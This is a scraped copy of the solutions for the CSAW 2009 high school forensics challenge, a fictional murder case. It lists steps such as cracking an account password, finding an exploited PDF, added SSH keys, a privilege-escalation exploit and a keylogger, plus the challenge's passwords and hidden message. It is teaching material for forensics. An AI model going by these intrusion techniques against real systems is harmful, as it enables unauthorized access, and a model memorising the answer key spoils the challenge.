Sie sind auf Seite 1von 4

CSAW 2009 High School Forensics Challenge Qualifying Round Solutions

Efstratios Gavas

The NYU-Poly Police (NPP) needs your help to solve a murder. After responding to reports of screaming in the area, the NPP discovered Johnny Muzic dead in his oce. Johnny Muzic was the executive at the newly-founded NYU-Poly ISIS Records, and has been seen hanging out with known criminals. Our investigation revealed that the company was about to release a new album by rock star Taylor Shift. During questioning Taylor told the NPP that Johnny had the latest cut of her new album, but we did not nd the album anywhere in the oce. Additionally, she told the NPP she believes Johnny and his business partner, Vikram Rekorder, have been arguing over her new role in the company. Vikram can not be found, and is wanted for questioning. Vikrams aid, Efstratios Gavas, was questioned, but only produced some network data. He knew nothing else. The network data was taken from two separate machines. Therefore, the two times are not synchronized and the relative time between the two is o. However, both datasets are from October 14.

Additional Evidence
The NPP has discovered a Twitter account which is associated with Mr. Muzic (http: // The NPP believes this is important new evidence and should be considered in your nal report.

Executive Summary of Challenge

Through the course of the investigation, the team should have discovered that Vikram was not the killer, but actually had been kidnapped. This was discovered by uncovering the following message steganographically hidden in an online image: This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I dont know if I will be able to communicate again. 1

Related Links

Challenge Solutions
1. Acquire jmuzic account password Description: Using password cracking tool to get jmuzic account password. The password is muzic. Diculty: Medium 2. Gain access to the jmuzic account Description: Reset password to gain access to the jmuzic account. Diculty: Easy 3. Identify msf.pdf as exploited pdf Description: Identify the msf.pdf le as being exploited and opens listener port when viewed. Diculty: Medium 4. Discover Description: Using jmuzics history le observe download of the enlight.tgz to discover vrekorder public website at Diculty: Medium 5. Discover Description: Using jmuzics history le observe download of the enlight.tgz to discover vrekorder public website at Diculty: Medium 6. Discover Facebook pages, and parkinglot image Description: Using jmuzics history le observe download of the enlight.tgz to discover vrekorder public website at Discover Facebook pages, and parkinglot image. Diculty: Medium 7. Find added ssh authorized key for jmuzic account Description: Find authorized key to allow remote access to the jmuzic account without password. Diculty: Medium 8. Extract enlight.tgz le Description: Extract the enlight.tgz. Diculty: Easy 2

9. Identify run null used in privilege escalation Description: Identify exploit code from the enlight.tgz le which allows local root privilege excalation. Diculty: Medium 10. Find added ssh authorized key for root account Description: Find authorized key to allow remote access to the root account without password. Diculty: Medium 11. Find .lkl directory Description: Using roots history le nd the .lkl directory in the /root directory. Diculty: Easy 12. Identify lkl keylogger directory as a keylogger. Description: Identify the contains of the /root/lkl Diculty: Medium 13. Decrypt, discover contract and songs Description: Decrypt /home/jmuzic/ using TrueCrypt and password from twitter message. The password is TAYLOR. Discover contract and songs. Diculty: Medium 14. Decrypt, discover gambling spreadsheets Description: Decrypt /home/jmuzic/ using TrueCrypt and password from twitter message. The password is thisisagoodpassword. Discover gambling spreadsheets, including account information on sheet2 of Game2.ods. Diculty: Medium 15. Discover directory Description: From packet #1223 in the pcap.evening evidence le, discover the hidden directory Diculty: Medium 16. Discover directory Description: From packet #1223 in the pcap.evening evidence le, discover the hidden directory Diculty: Medium 17. Observe successful brute force on vrekorder account Description: From the pcap.morning evidence le, discover successful brute force attack on vrekorder account. Diculty: Medium

18. Gain access to directory Description: Gain access to the directory by using information gathered from facebook pages. UID:vrekorder PWD:parkinglot Diculty: Hard 19. Extract hidden message from 21.22.jpg Description: Extract hidden message from 2009-10-1415.21.22.jpg le by using information previously gathered. PWD:parkinglot The message is as follows: This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I dont know if I will be able to communicate again. VR Diculty: Hard

Das könnte Ihnen auch gefallen